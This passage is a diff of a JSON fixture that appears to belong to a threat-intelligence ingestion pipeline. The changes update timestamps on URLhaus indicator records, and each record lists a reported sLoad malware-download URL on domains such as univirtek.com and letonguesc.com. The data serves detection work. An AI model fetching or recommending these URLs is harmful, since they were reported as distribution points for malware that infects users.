@@ -4462,7 +4462,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025165600Z", + "ingested": "2021-12-14T14:56:15.726422784Z", "original": "{\"id\":\"961457\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961457/\",\"url\":\"https://letonguesc.com/leto/08658331007/blank.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:39 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4508,7 +4508,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025172700Z", + "ingested": "2021-12-14T14:56:15.726423155Z", "original": "{\"id\":\"961450\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961450/\",\"url\":\"https://cxminute.com/minu/01098910324/blank.png\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:49:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4554,7 +4554,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025179500Z", + "ingested": "2021-12-14T14:56:15.726423518Z", "original": "{\"id\":\"961451\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961451/\",\"url\":\"https://univirtek.com/viro/02794390233/uk.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -4600,7 +4600,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025186300Z", + "ingested": "2021-12-14T14:56:15.726423878Z", "original": "{\"id\":\"961452\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961452/\",\"url\":\"https://univirtek.com/viro/CSTDNT69D63F754D/en.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4646,7 +4646,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025195200Z", + "ingested": "2021-12-14T14:56:15.726424255Z", "original": "{\"id\":\"961453\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961453/\",\"url\":\"https://univirtek.com/viro/GSTGNE91B06L219W/1x1.jpg\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4692,7 +4692,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025202300Z", + "ingested": "2021-12-14T14:56:15.726424615Z", "original": "{\"id\":\"961454\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961454/\",\"url\":\"https://univirtek.com/viro/03610140125/map.jpg\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -4738,7 +4738,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025209200Z", + "ingested": "2021-12-14T14:56:15.726424974Z", "original": "{\"id\":\"961448\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961448/\",\"url\":\"https://belfetproduction.com/bella/CRRLRD74E09A462T/blank.png\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:49:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4784,7 +4784,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025216100Z", + "ingested": "2021-12-14T14:56:15.726425722Z", "original": "{\"id\":\"961449\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961449/\",\"url\":\"https://univirtek.com/viro/RSTFRZ57T05G337C/maps.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4830,7 +4830,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025223Z", + "ingested": "2021-12-14T14:56:15.726426076Z", "original": "{\"id\":\"961447\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961447/\",\"url\":\"https://letonguesc.com/leto/LBRFNC56S10D952D/map.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -4876,7 +4876,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025229900Z", + "ingested": "2021-12-14T14:56:15.726426434Z", "original": "{\"id\":\"961444\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961444/\",\"url\":\"https://univirtek.com/viro/01669890194/it.gif\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4922,7 +4922,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025236800Z", + "ingested": "2021-12-14T14:56:15.726426782Z", "original": "{\"id\":\"961445\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961445/\",\"url\":\"https://letonguesc.com/leto/GTNNTN60P12H632S/maps.css\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4968,7 +4968,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025243600Z", + "ingested": "2021-12-14T14:56:15.726427251Z", "original": "{\"id\":\"961446\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961446/\",\"url\":\"https://cxminute.com/minu/ZHOXBN72B06Z210N/en.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:49:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -5014,7 +5014,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025250500Z", + "ingested": "2021-12-14T14:56:15.726427703Z", "original": "{\"id\":\"961442\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961442/\",\"url\":\"https://letonguesc.com/leto/KHNGGR61S21Z112Y/uk.css\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5060,7 +5060,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025257300Z", + "ingested": "2021-12-14T14:56:15.726428075Z", "original": "{\"id\":\"961443\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961443/\",\"url\":\"https://ladiesincode.com/ladi/MNRMNL75A12I531F/uk.jpg\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:49:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5106,7 +5106,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025264200Z", + "ingested": "2021-12-14T14:56:15.726428433Z", "original": "{\"id\":\"961438\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961438/\",\"url\":\"https://ladiesincode.com/ladi/RBGMNL67A02L675L/uk.css\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -5152,7 +5152,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025271100Z", + "ingested": "2021-12-14T14:56:15.726428784Z", "original": "{\"id\":\"961439\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961439/\",\"url\":\"https://letonguesc.com/leto/RSSPPL67P15G535L/map.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5198,7 +5198,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025278100Z", + "ingested": "2021-12-14T14:56:15.726429318Z", "original": "{\"id\":\"961440\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961440/\",\"url\":\"https://fhivelifestyle.online/nhbrwvdffsgt/adf/uk.css\",\"url_status\":\"offline\",\"host\":\"fhivelifestyle.online\",\"date_added\":\"2021-01-14 20:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5244,7 +5244,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025285200Z", + "ingested": "2021-12-14T14:56:15.726429885Z", "original": "{\"id\":\"961441\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961441/\",\"url\":\"https://letonguesc.com/leto/BNTLGU67R11L706R/blank.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -5290,7 +5290,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025292200Z", + "ingested": "2021-12-14T14:56:15.726430245Z", "original": "{\"id\":\"961437\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961437/\",\"url\":\"https://cxminute.com/minu/03713610651/map.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:48:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5336,7 +5336,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025299Z", + "ingested": "2021-12-14T14:56:15.726430674Z", "original": "{\"id\":\"961436\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961436/\",\"url\":\"https://univirtek.com/viro/01312580507/uk.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5382,7 +5382,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025306Z", + "ingested": "2021-12-14T14:56:15.726431092Z", "original": "{\"id\":\"961431\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961431/\",\"url\":\"https://cxminute.com/minu/FRNRST34B11F843P/blank.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:48:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -5428,7 +5428,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025312800Z", + "ingested": "2021-12-14T14:56:15.726431444Z", "original": "{\"id\":\"961432\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961432/\",\"url\":\"https://univirtek.com/viro/RCUNDA90D24Z100H/1x1.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5474,7 +5474,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025319700Z", + "ingested": "2021-12-14T14:56:15.726431804Z", "original": "{\"id\":\"961433\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961433/\",\"url\":\"https://univirtek.com/viro/GTTGRI72H19A952D/map.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5520,7 +5520,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025326500Z", + "ingested": "2021-12-14T14:56:15.726432177Z", "original": "{\"id\":\"961434\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961434/\",\"url\":\"https://univirtek.com/viro/00385010103/map.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -5566,7 +5566,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025333400Z", + "ingested": "2021-12-14T14:56:15.726432645Z", "original": "{\"id\":\"961435\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961435/\",\"url\":\"https://ladiesincode.com/ladi/04263990162/map.css\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:48:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5612,7 +5612,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025340300Z", + "ingested": "2021-12-14T14:56:15.726433070Z", "original": "{\"id\":\"961428\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961428/\",\"url\":\"https://univirtek.com/viro/BNNSFN74A13G674O/logo.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5658,7 +5658,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025347200Z", + "ingested": "2021-12-14T14:56:15.726433423Z", "original": "{\"id\":\"961429\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961429/\",\"url\":\"https://univirtek.com/viro/RZZCRS93B15G224O/it.gif\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -5704,7 +5704,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025354100Z", + "ingested": "2021-12-14T14:56:15.726433780Z", "original": "{\"id\":\"961430\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961430/\",\"url\":\"https://cxminute.com/minu/01495100032/maps.gif\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:48:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5750,7 +5750,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025361Z", + "ingested": "2021-12-14T14:56:15.726434623Z", "original": "{\"id\":\"961427\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961427/\",\"url\":\"https://letonguesc.com/leto/CMPDVD69C11G693Z/map.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:48:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5796,7 +5796,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025367800Z", + "ingested": "2021-12-14T14:56:15.726435051Z", "original": "{\"id\":\"961426\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961426/\",\"url\":\"https://cxminute.com/minu/LLLMRC84B29A944R/it.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:48:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -5842,7 +5842,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025374700Z", + "ingested": "2021-12-14T14:56:15.726435410Z", "original": "{\"id\":\"961421\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961421/\",\"url\":\"https://cxminute.com/minu/PRSSFN72L18C573S/map.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:48:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5888,7 +5888,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025381600Z", + "ingested": "2021-12-14T14:56:15.726435767Z", "original": "{\"id\":\"961422\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961422/\",\"url\":\"https://ladiesincode.com/ladi/00814870150/1x1.png\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:48:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5934,7 +5934,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025388400Z", + "ingested": "2021-12-14T14:56:15.726436129Z", "original": "{\"id\":\"961423\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961423/\",\"url\":\"https://ladiesincode.com/ladi/03635540234/it.gif\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:48:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -5980,7 +5980,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025395300Z", + "ingested": "2021-12-14T14:56:15.726436588Z", "original": "{\"id\":\"961424\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961424/\",\"url\":\"https://univirtek.com/viro/PLCSFN62B11D548Q/map.gif\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6026,7 +6026,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025402200Z", + "ingested": "2021-12-14T14:56:15.726436948Z", "original": "{\"id\":\"961425\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961425/\",\"url\":\"https://univirtek.com/viro/03294650167/maps.jpg\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6072,7 +6072,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025409200Z", + "ingested": "2021-12-14T14:56:15.726437297Z", "original": "{\"id\":\"961418\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961418/\",\"url\":\"https://univirtek.com/viro/GGLSCR73D17C627Q/blank.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -6118,7 +6118,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025416100Z", + "ingested": "2021-12-14T14:56:15.726437655Z", "original": "{\"id\":\"961419\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961419/\",\"url\":\"https://univirtek.com/viro/CRRLRA68A70H501X/maps.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6164,7 +6164,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025422900Z", + "ingested": "2021-12-14T14:56:15.726438127Z", "original": "{\"id\":\"961420\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961420/\",\"url\":\"https://ladiesincode.com/ladi/CRSNLD59R12L840V/blank.jpg\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:48:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6210,7 +6210,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025429800Z", + "ingested": "2021-12-14T14:56:15.726438538Z", "original": "{\"id\":\"961416\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961416/\",\"url\":\"https://belfetproduction.com/bella/RTTCRL58M29A794D/logo.css\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:47:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -6256,7 +6256,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025436500Z", + "ingested": "2021-12-14T14:56:15.726438903Z", "original": "{\"id\":\"961417\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961417/\",\"url\":\"https://letonguesc.com/leto/04138120169/en.jpg\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:47:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6302,7 +6302,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025443400Z", + "ingested": "2021-12-14T14:56:15.726439260Z", "original": "{\"id\":\"961408\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961408/\",\"url\":\"https://letonguesc.com/leto/SPGMRC73H13A475I/it.jpg\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6348,7 +6348,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025450300Z", + "ingested": "2021-12-14T14:56:15.726439624Z", "original": "{\"id\":\"961409\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961409/\",\"url\":\"https://letonguesc.com/leto/80007070552/it.png\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -6394,7 +6394,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025457200Z", + "ingested": "2021-12-14T14:56:15.726439992Z", "original": "{\"id\":\"961410\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961410/\",\"url\":\"https://letonguesc.com/leto/02482130271/logo.png\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6440,7 +6440,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025464Z", + "ingested": "2021-12-14T14:56:15.726440402Z", "original": "{\"id\":\"961411\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961411/\",\"url\":\"https://univirtek.com/viro/15730201009/uk.gif\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:47:33 